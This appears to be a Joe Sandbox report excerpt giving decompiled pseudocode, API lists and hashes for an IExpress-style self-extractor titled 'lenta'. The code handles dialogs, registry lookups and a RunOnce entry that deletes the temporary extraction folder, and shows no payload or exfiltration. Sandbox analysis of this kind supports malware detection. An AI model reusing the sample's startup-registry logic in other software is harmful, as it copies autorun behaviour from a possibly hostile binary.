                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                              • API String ID: 1002816675-2993962200
                              • Opcode ID: 16dc41537086badf59ec882909998913935c528488d9a6055d1373aa0cdb489d
                              • Instruction ID: 8119e3263a5865886b95d89f7e2499350b03588a0d8579584fe4bfb4087836fd
                              • Opcode Fuzzy Hash: 16dc41537086badf59ec882909998913935c528488d9a6055d1373aa0cdb489d
                              • Instruction Fuzzy Hash: 0F51D2707403016BE760ABA49D4AB7B3AACEB95740F40C43AF94DD51E1DBB88C83C765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E00A734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t9;
                              				void* _t12;
                              				void* _t13;
                              				void* _t17;
                              				void* _t23;
                              				void* _t25;
                              				struct HWND__* _t35;
                              				struct HWND__* _t38;
                              				void* _t39;
                              
                              				_t9 = _a8 - 0x10;
                              				if(_t9 == 0) {
                              					__eflags = 1;
                              					L19:
                              					_push(0);
                              					 *0xa791d8 = 1;
                              					L20:
                              					_push(_a4);
                              					L21:
                              					EndDialog();
                              					L22:
                              					return 1;
                              				}
                              				_push(1);
                              				_pop(1);
                              				_t12 = _t9 - 0xf2;
                              				if(_t12 == 0) {
                              					__eflags = _a12 - 0x1b;
                              					if(_a12 != 0x1b) {
                              						goto L22;
                              					}
                              					goto L19;
                              				}
                              				_t13 = _t12 - 0xe;
                              				if(_t13 == 0) {
                              					_t35 = _a4;
                              					 *0xa78584 = _t35;
                              					E00A743D0(_t35, GetDesktopWindow());
                              					__eflags =  *0xa78184; // 0x1
                              					if(__eflags != 0) {
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                              					}
                              					SetWindowTextA(_t35, "lenta");
                              					_t17 = CreateThread(0, 0, E00A74FE0, 0, 0, 0xa78798);
                              					 *0xa7879c = _t17;
                              					__eflags = _t17;
                              					if(_t17 != 0) {
                              						goto L22;
                              					} else {
                              						E00A744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                              						_push(0);
                              						_push(_t35);
                              						goto L21;
                              					}
                              				}
                              				_t23 = _t13 - 1;
                              				if(_t23 == 0) {
                              					__eflags = _a12 - 2;
                              					if(_a12 != 2) {
                              						goto L22;
                              					}
                              					ResetEvent( *0xa7858c);
                              					_t38 =  *0xa78584; // 0x0
                              					_t25 = E00A744B9(_t38, 0x4b2, 0xa71140, 0, 0x20, 4);
                              					__eflags = _t25 - 6;
                              					if(_t25 == 6) {
                              						L11:
                              						 *0xa791d8 = 1;
                              						SetEvent( *0xa7858c);
                              						_t39 =  *0xa7879c; // 0x0
                              						E00A73680(_t39);
                              						_push(0);
                              						goto L20;
                              					}
                              					__eflags = _t25 - 1;
                              					if(_t25 == 1) {
                              						goto L11;
                              					}
                              					SetEvent( *0xa7858c);
                              					goto L22;
                              				}
                              				if(_t23 == 0xe90) {
                              					TerminateThread( *0xa7879c, 0);
                              					EndDialog(_a4, _a12);
                              					return 1;
                              				}
                              				return 0;
                              			}













                              APIs
                              • TerminateThread.KERNEL32(00000000), ref: 00A73535
                              • EndDialog.USER32(?,?), ref: 00A73541
                              • ResetEvent.KERNEL32 ref: 00A7355F
                              • SetEvent.KERNEL32(00A71140,00000000,00000020,00000004), ref: 00A73590
                              • GetDesktopWindow.USER32 ref: 00A735C7
                              • GetDlgItem.USER32(?,0000083B), ref: 00A735F1
                              • SendMessageA.USER32(00000000), ref: 00A735F8
                              • GetDlgItem.USER32(?,0000083B), ref: 00A73610
                              • SendMessageA.USER32(00000000), ref: 00A73617
                              • SetWindowTextA.USER32(?,lenta), ref: 00A73623
                              • CreateThread.KERNEL32 ref: 00A73637
                              • EndDialog.USER32(?,00000000), ref: 00A73671
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                              • String ID: lenta
                              • API String ID: 2406144884-2780258678
                              • Opcode ID: cb6e576f68fac53e8cf16705a433f72a880496b6ac94de7df9cef50602065629
                              • Instruction ID: 1882860fff6773b9905055aad0fc30419757912ecf0185f58d7cc79e1f223b0b
                              • Opcode Fuzzy Hash: cb6e576f68fac53e8cf16705a433f72a880496b6ac94de7df9cef50602065629
                              • Instruction Fuzzy Hash: 7F31E432340300BBDB209FA5EC0DE2B3B65E7D5B11F51C629F60E952B1CB758982EA55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E00A74224(char __ecx) {
                              				char* _v8;
                              				_Unknown_base(*)()* _v12;
                              				_Unknown_base(*)()* _v16;
                              				_Unknown_base(*)()* _v20;
                              				char* _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				char _v48;
                              				char _v52;
                              				_Unknown_base(*)()* _t26;
                              				_Unknown_base(*)()* _t28;
                              				_Unknown_base(*)()* _t29;
                              				_Unknown_base(*)()* _t32;
                              				char _t42;
                              				char* _t44;
                              				char* _t61;
                              				void* _t63;
                              				char* _t65;
                              				struct HINSTANCE__* _t66;
                              				char _t67;
                              				void* _t71;
                              				char _t76;
                              				intOrPtr _t85;
                              
                              				_t67 = __ecx;
                              				_t66 = LoadLibraryA("SHELL32.DLL");
                              				if(_t66 == 0) {
                              					_t63 = 0x4c2;
                              					L22:
                              					E00A744B9(_t67, _t63, 0, 0, 0x10, 0);
                              					return 0;
                              				}
                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                              				_v12 = _t26;
                              				if(_t26 == 0) {
                              					L20:
                              					FreeLibrary(_t66);
                              					_t63 = 0x4c1;
                              					goto L22;
                              				}
                              				_t28 = GetProcAddress(_t66, 0xc3);
                              				_v20 = _t28;
                              				if(_t28 == 0) {
                              					goto L20;
                              				}
                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                              				_v16 = _t29;
                              				if(_t29 == 0) {
                              					goto L20;
                              				}
                              				_t76 =  *0xa788c0; // 0x0
                              				if(_t76 != 0) {
                              					L10:
                              					 *0xa787a0 = 0;
                              					_v52 = _t67;
                              					_v48 = 0;
                              					_v44 = 0;
                              					_v40 = 0xa78598;
                              					_v36 = 1;
                              					_v32 = E00A74200;
                              					_v28 = 0xa788c0;
                              					 *0xa7a288( &_v52);
                              					_t32 =  *_v12();
                              					if(_t71 != _t71) {
                              						asm("int 0x29");
                              					}
                              					_v12 = _t32;
                              					if(_t32 != 0) {
                              						 *0xa7a288(_t32, 0xa788c0);
                              						 *_v16();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              						if( *0xa788c0 != 0) {
                              							E00A71680(0xa787a0, 0x104, 0xa788c0);
                              						}
                              						 *0xa7a288(_v12);
                              						 *_v20();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              					}
                              					FreeLibrary(_t66);
                              					_t85 =  *0xa787a0; // 0x0
                              					return 0 | _t85 != 0x00000000;
                              				} else {
                              					GetTempPathA(0x104, 0xa788c0);
                              					_t61 = 0xa788c0;
                              					_t4 =  &(_t61[1]); // 0xa788c1
                              					_t65 = _t4;
                              					do {
                              						_t42 =  *_t61;
                              						_t61 =  &(_t61[1]);
                              					} while (_t42 != 0);
                              					_t5 = _t61 - _t65 + 0xa788c0; // 0x14f1181
                              					_t44 = CharPrevA(0xa788c0, _t5);
                              					_v8 = _t44;
                              					if( *_t44 == 0x5c &&  *(CharPrevA(0xa788c0, _t44)) != 0x3a) {
                              						 *_v8 = 0;
                              					}
                              					goto L10;
                              				}
                              			}

                              APIs
                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A74236
                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A7424C
                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A74263
                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A7427A
                              • GetTempPathA.KERNEL32(00000104,00A788C0,?,00000001), ref: 00A7429F
                              • CharPrevA.USER32(00A788C0,014F1181,?,00000001), ref: 00A742C2
                              • CharPrevA.USER32(00A788C0,00000000,?,00000001), ref: 00A742D6
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A74391
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A743A5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                              • API String ID: 1865808269-1731843650
                              • Opcode ID: ee398c260b225950a669bb30c9c405315b13a553c3d9ed1a0fc8f11202c65180
                              • Instruction ID: 6a07b75348c921c354c4ed2c34315f904b95d2a50d08cca6941fe31d0f9df446
                              • Opcode Fuzzy Hash: ee398c260b225950a669bb30c9c405315b13a553c3d9ed1a0fc8f11202c65180
                              • Instruction Fuzzy Hash: B6412875A40200BFE7119FB4DC8C9AE7BB4EB48385F44C569E94DA7251CB788C42C762
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                              				signed int _v8;
                              				char _v64;
                              				char _v576;
                              				void* _v580;
                              				struct HWND__* _v584;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t34;
                              				void* _t37;
                              				signed int _t39;
                              				intOrPtr _t43;
                              				signed int _t44;
                              				signed int _t49;
                              				signed int _t52;
                              				void* _t54;
                              				intOrPtr _t55;
                              				intOrPtr _t58;
                              				intOrPtr _t59;
                              				int _t64;
                              				void* _t66;
                              				intOrPtr* _t67;
                              				signed int _t69;
                              				intOrPtr* _t73;
                              				intOrPtr* _t76;
                              				intOrPtr* _t77;
                              				void* _t80;
                              				void* _t81;
                              				void* _t82;
                              				intOrPtr* _t84;
                              				void* _t85;
                              				signed int _t89;
                              
                              				_t75 = __edx;
                              				_t34 =  *0xa78004; // 0x74742267
                              				_v8 = _t34 ^ _t89;
                              				_v584 = __ecx;
                              				_t83 = "LoadString() Error.  Could not load string resource.";
                              				_t67 = _a4;
                              				_t69 = 0xd;
                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                              				_t80 = _t83 + _t69 + _t69;
                              				_v580 = _t37;
                              				asm("movsb");
                              				if(( *0xa78a38 & 0x00000001) != 0) {
                              					_t39 = 1;
                              				} else {
                              					_v576 = 0;
                              					LoadStringA( *0xa79a3c, _t75,  &_v576, 0x200);
                              					if(_v576 != 0) {
                              						_t73 =  &_v576;
                              						_t16 = _t73 + 1; // 0x1
                              						_t75 = _t16;
                              						do {
                              							_t43 =  *_t73;
                              							_t73 = _t73 + 1;
                              						} while (_t43 != 0);
                              						_t84 = _v580;
                              						_t74 = _t73 - _t75;
                              						if(_t84 == 0) {
                              							if(_t67 == 0) {
                              								_t27 = _t74 + 1; // 0x2
                              								_t83 = _t27;
                              								_t44 = LocalAlloc(0x40, _t83);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									_t75 = _t83;
                              									_t74 = _t80;
                              									E00A71680(_t80, _t83,  &_v576);
                              									goto L23;
                              								}
                              							} else {
                              								_t76 = _t67;
                              								_t24 = _t76 + 1; // 0x1
                              								_t85 = _t24;
                              								do {
                              									_t55 =  *_t76;
                              									_t76 = _t76 + 1;
                              								} while (_t55 != 0);
                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                              								_t83 = _t25 + _t74;
                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									E00A7171E(_t80, _t83,  &_v576, _t67);
                              									goto L23;
                              								}
                              							}
                              						} else {
                              							_t77 = _t67;
                              							_t18 = _t77 + 1; // 0x1
                              							_t81 = _t18;
                              							do {
                              								_t58 =  *_t77;
                              								_t77 = _t77 + 1;
                              							} while (_t58 != 0);
                              							_t75 = _t77 - _t81;
                              							_t82 = _t84 + 1;
                              							do {
                              								_t59 =  *_t84;
                              								_t84 = _t84 + 1;
                              							} while (_t59 != 0);
                              							_t21 = _t74 + 0x64; // 0x65
                              							_t83 = _t21 + _t84 - _t82 + _t75;
                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                              							_t80 = _t44;
                              							if(_t80 == 0) {
                              								goto L6;
                              							} else {
                              								_push(_v580);
                              								E00A7171E(_t80, _t83,  &_v576, _t67);
                              								L23:
                              								MessageBeep(_a12);
                              								if(E00A7681F(_t67) == 0) {
                              									L25:
                              									_t49 = 0x10000;
                              								} else {
                              									_t54 = E00A767C9(_t74, _t74);
                              									_t49 = 0x190000;
                              									if(_t54 == 0) {
                              										goto L25;
                              									}
                              								}
                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                              								_t83 = _t52;
                              								LocalFree(_t80);
                              								_t39 = _t52;
                              							}
                              						}
                              					} else {
                              						if(E00A7681F(_t67) == 0) {
                              							L4:
                              							_t64 = 0x10010;
                              						} else {
                              							_t66 = E00A767C9(0, 0);
                              							_t64 = 0x190010;
                              							if(_t66 == 0) {
                              								goto L4;
                              							}
                              						}
                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                              						L6:
                              						_t39 = _t44 | 0xffffffff;
                              					}
                              				}
                              				return E00A76CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                              			}

                              APIs
                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A745A3
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A745E3
                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A7460D
                              • MessageBeep.USER32(00000000), ref: 00A74630
                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A74666
                              • LocalFree.KERNEL32(00000000), ref: 00A7466F
                                • Part of subcall function 00A7681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A7686E
                                • Part of subcall function 00A7681F: GetSystemMetrics.USER32(0000004A), ref: 00A768A7
                                • Part of subcall function 00A7681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A768CC
                                • Part of subcall function 00A7681F: RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,?,0000000C), ref: 00A768F4
                                • Part of subcall function 00A7681F: RegCloseKey.ADVAPI32(?), ref: 00A76902
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                              • String ID: LoadString() Error. Could not load string resource.$lenta
                              • API String ID: 3244514340-1000497449
                              • Opcode ID: f13acb1defd41eb0ae58a766bc48be12fe380aedd95f97afc1ec736ede777590
                              • Instruction ID: 549a80cbfe31d7559c61bf7a5ab37d2d2e539fb2296dbc2fa44f60b633608be0
                              • Opcode Fuzzy Hash: f13acb1defd41eb0ae58a766bc48be12fe380aedd95f97afc1ec736ede777590
                              • Instruction Fuzzy Hash: 5851D672900115ABDB21DF68CC48BAABBB9EF89300F14C1A5FD1DA7241DB31DD46CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A72773(CHAR* __ecx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				char _v269;
                              				CHAR* _v276;
                              				int _v280;
                              				void* _v284;
                              				int _v288;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t23;
                              				intOrPtr _t34;
                              				int _t45;
                              				int* _t50;
                              				CHAR* _t52;
                              				CHAR* _t61;
                              				char* _t62;
                              				int _t63;
                              				CHAR* _t64;
                              				signed int _t65;
                              
                              				_t52 = __ecx;
                              				_t23 =  *0xa78004; // 0x74742267
                              				_v8 = _t23 ^ _t65;
                              				_t62 = _a4;
                              				_t50 = 0;
                              				_t61 = __ecx;
                              				_v276 = _t62;
                              				 *((char*)(__ecx)) = 0;
                              				if( *_t62 != 0x23) {
                              					_t63 = 0x104;
                              					goto L14;
                              				} else {
                              					_t64 = _t62 + 1;
                              					_v269 = CharUpperA( *_t64);
                              					_v276 = CharNextA(CharNextA(_t64));
                              					_t63 = 0x104;
                              					_t34 = _v269;
                              					if(_t34 == 0x53) {
                              						L14:
                              						GetSystemDirectoryA(_t61, _t63);
                              						goto L15;
                              					} else {
                              						if(_t34 == 0x57) {
                              							GetWindowsDirectoryA(_t61, 0x104);
                              							goto L16;
                              						} else {
                              							_push(_t52);
                              							_v288 = 0x104;
                              							E00A71781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                              							_t59 = 0x104;
                              							E00A7658A( &_v268, 0x104, _v276);
                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                              								L16:
                              								_t59 = _t63;
                              								E00A7658A(_t61, _t63, _v276);
                              							} else {
                              								if(RegQueryValueExA(_v284, 0xa71140, 0,  &_v280, _t61,  &_v288) == 0) {
                              									_t45 = _v280;
                              									if(_t45 != 2) {
                              										L9:
                              										if(_t45 == 1) {
                              											goto L10;
                              										}
                              									} else {
                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                              											_t45 = _v280;
                              											goto L9;
                              										} else {
                              											_t59 = 0x104;
                              											E00A71680(_t61, 0x104,  &_v268);
                              											L10:
                              											_t50 = 1;
                              										}
                              									}
                              								}
                              								RegCloseKey(_v284);
                              								L15:
                              								if(_t50 == 0) {
                              									goto L16;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E00A76CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                              			}

                              APIs
                              • CharUpperA.USER32(74742267,00000000,00000000,00000000), ref: 00A727A8
                              • CharNextA.USER32(0000054D), ref: 00A727B5
                              • CharNextA.USER32(00000000), ref: 00A727BC
                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72829
                              • RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72852
                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72870
                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A728A0
                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A728AA
                              • GetSystemDirectoryA.KERNEL32 ref: 00A728B9
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A727E4
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                              • API String ID: 2659952014-2428544900
                              • Opcode ID: 1930bd849d01fbba169683b1bff5900a9acb256dc6dd738b76cb99d3054fb284
                              • Instruction ID: a76d88b6f3eace77170561661d880eb3c9e852400c7c728ed7c3e20681c6743f
                              • Opcode Fuzzy Hash: 1930bd849d01fbba169683b1bff5900a9acb256dc6dd738b76cb99d3054fb284
                              • Instruction Fuzzy Hash: 2C41A271A00128AFDB249B64DC85BEE77BDEB65701F00C4A9F58DD2100DB708EC69FA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E00A72267() {
                              				signed int _v8;
                              				char _v268;
                              				char _v836;
                              				void* _v840;
                              				int _v844;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				intOrPtr _t33;
                              				void* _t38;
                              				intOrPtr* _t42;
                              				void* _t45;
                              				void* _t47;
                              				void* _t49;
                              				signed int _t51;
                              
                              				_t19 =  *0xa78004; // 0x74742267
                              				_t20 = _t19 ^ _t51;
                              				_v8 = _t19 ^ _t51;
                              				if( *0xa78530 != 0) {
                              					_push(_t49);
                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                              						_push(_t38);
                              						_v844 = 0x238;
                              						if(RegQueryValueExA(_v840, "wextract_cleanup1", 0, 0,  &_v836,  &_v844) == 0) {
                              							_push(_t47);
                              							memset( &_v268, 0, 0x104);
                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              								E00A7658A( &_v268, 0x104, 0xa71140);
                              							}
                              							_push("C:\\Users\\jones\\AppData\\Local\\Temp\\IXP001.TMP\\");
                              							E00A7171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                              							_t42 =  &_v836;
                              							_t45 = _t42 + 1;
                              							_pop(_t47);
                              							do {
                              								_t33 =  *_t42;
                              								_t42 = _t42 + 1;
                              							} while (_t33 != 0);
                              							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                              						}
                              						_t20 = RegCloseKey(_v840);
                              						_pop(_t38);
                              					}
                              					_pop(_t49);
                              				}
                              				return E00A76CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                              			}

                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A722A3
                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00A722D8
                              • memset.MSVCRT ref: 00A722F5
                              • GetSystemDirectoryA.KERNEL32 ref: 00A72305
                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A7236E
                              • RegCloseKey.ADVAPI32(?), ref: 00A7237A
                              Strings
                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A7232D
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A72321
                              • wextract_cleanup1, xrefs: 00A7227C, 00A722CD, 00A72363
                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A72299
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                              • API String ID: 3027380567-2601155950
                              • Opcode ID: 4d17449e160fc15c7b54c254d5d216dc163fb628b4ac3fe056bb345cf2ee3a39
                              • Instruction ID: f03128d3fcf0fd66ae39513eda642b73b2ec82562f742ba78af9846d5a15e976
                              • Opcode Fuzzy Hash: 4d17449e160fc15c7b54c254d5d216dc163fb628b4ac3fe056bb345cf2ee3a39
                              • Instruction Fuzzy Hash: D431C571A002187BDB21DB60DC49FEF7B7CFB54700F00C5A9B50DAA051EA74AB8ACB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E00A73100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* _t8;
                              				void* _t11;
                              				void* _t15;
                              				struct HWND__* _t16;
                              				struct HWND__* _t33;
                              				struct HWND__* _t34;
                              
                              				_t8 = _a8 - 0xf;
                              				if(_t8 == 0) {
                              					if( *0xa78590 == 0) {
                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                              						 *0xa78590 = 1;
                              					}
                              					L13:
                              					return 0;
                              				}
                              				_t11 = _t8 - 1;
                              				if(_t11 == 0) {
                              					L7:
                              					_push(0);
                              					L8:
                              					EndDialog(_a4, ??);
                              					L9:
                              					return 1;
                              				}
                              				_t15 = _t11 - 0x100;
                              				if(_t15 == 0) {
                              					_t16 = GetDesktopWindow();
                              					_t33 = _a4;
                              					E00A743D0(_t33, _t16);
                              					SetDlgItemTextA(_t33, 0x834,  *0xa78d4c);
                              					SetWindowTextA(_t33, "lenta");
                              					SetForegroundWindow(_t33);
                              					_t34 = GetDlgItem(_t33, 0x834);
                              					 *0xa788b8 = GetWindowLongA(_t34, 0xfffffffc);
                              					SetWindowLongA(_t34, 0xfffffffc, E00A730C0);
                              					return 1;
                              				}
                              				if(_t15 != 1) {
                              					goto L13;
                              				}
                              				if(_a12 != 6) {
                              					if(_a12 != 7) {
                              						goto L9;
                              					}
                              					goto L7;
                              				}
                              				_push(1);
                              				goto L8;
                              			}

                              APIs
                              • EndDialog.USER32(?,00000000), ref: 00A7313B
                              • GetDesktopWindow.USER32 ref: 00A7314B
                              • SetDlgItemTextA.USER32(?,00000834), ref: 00A7316A
                              • SetWindowTextA.USER32(?,lenta), ref: 00A73176
                              • SetForegroundWindow.USER32(?), ref: 00A7317D
                              • GetDlgItem.USER32(?,00000834), ref: 00A73185
                              • GetWindowLongA.USER32(00000000,000000FC), ref: 00A73190
                              • SetWindowLongA.USER32(00000000,000000FC,00A730C0), ref: 00A731A3
                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A731CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
